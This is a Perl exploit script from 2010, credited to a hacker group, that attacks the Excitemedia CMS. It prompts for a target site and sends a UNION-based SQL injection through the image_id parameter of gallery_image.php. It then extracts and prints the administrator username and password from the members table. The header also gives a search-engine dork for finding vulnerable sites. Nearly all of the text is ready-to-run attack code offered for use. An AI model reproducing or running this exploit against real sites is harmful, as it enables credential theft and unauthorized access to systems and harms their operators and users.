1 #!/usr/bin/perl −w
2
3 # Excitemedia CMS Sql injection vulnerability #
4 ########################################
5 #[+] Author : Dr.0rYX AND Cr3W−DZ
6 #[+] Greetz : HIS0K4 − claw and all the other friends
7 #[+] inurl:M−^Tgallery_image.php?image_id=M−^T
8 #[+] Vendor: http://www.excitemedia.com.au
9 #[+] sell script with host
10 ########################################
11 print "\t\t| NORTH−AFRICA SECURITY TEAM |\n\n";
12 print "[x] Dr.0rYX AND Cr3W−DZ\n\n";
13 print "[x] N.A.S.T\n\n";
14 print "[x] Excitemedia Cms Sql injection vulnerability\n\n";
15 print "[x] www.nasteam.wordpress.com\n\n";
16 print "\t\t| vx3[at]hotmail.de |\n\n";
17 print "\t\t| cr3w[at]hotmail.de |\n\n";
18 use LWP::UserAgent;
19 print "\nTarget page:[http://site/path/]: ";
20 chomp(my $target=<STDIN>);
21 $column_name="concat(0x757365723d,username,0x3a,0x70617373776f72643d,password)";
22 $table_name="members";
23 $b = LWP::UserAgent−>new() or die "Could not initialize browser\n";
24 $b−>agent(’Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’);
25 $host = $target."/gallery_image.php?image_id=1 and 1=0 union select 1,2,".$column_name.",4,5,6,7,8 from ".$table_name."
26
27
limit 0,1−−";
28 $res = $b−>request(HTTP::Request−>new(GET=>$host));
29 $answer = $res−>content; if ($answer =~ /user=(.*?):/){
30 print "\n[+] Admin username : $1\n\n";
31 }
32 else{print "\nError\n";
33 }
34 $answer = $res−>content; if ($answer =~ /password=(.*?)<\/div>/){
35 print "\n[+] Admin password : $1\n\n";
36 }
37 else{print "\nError\n";
38 }
Page 1/1
Excitemedia CMS SQL Injection Vulnerability
Dr.0rYX AND Cr3W−DZ
04/23/2010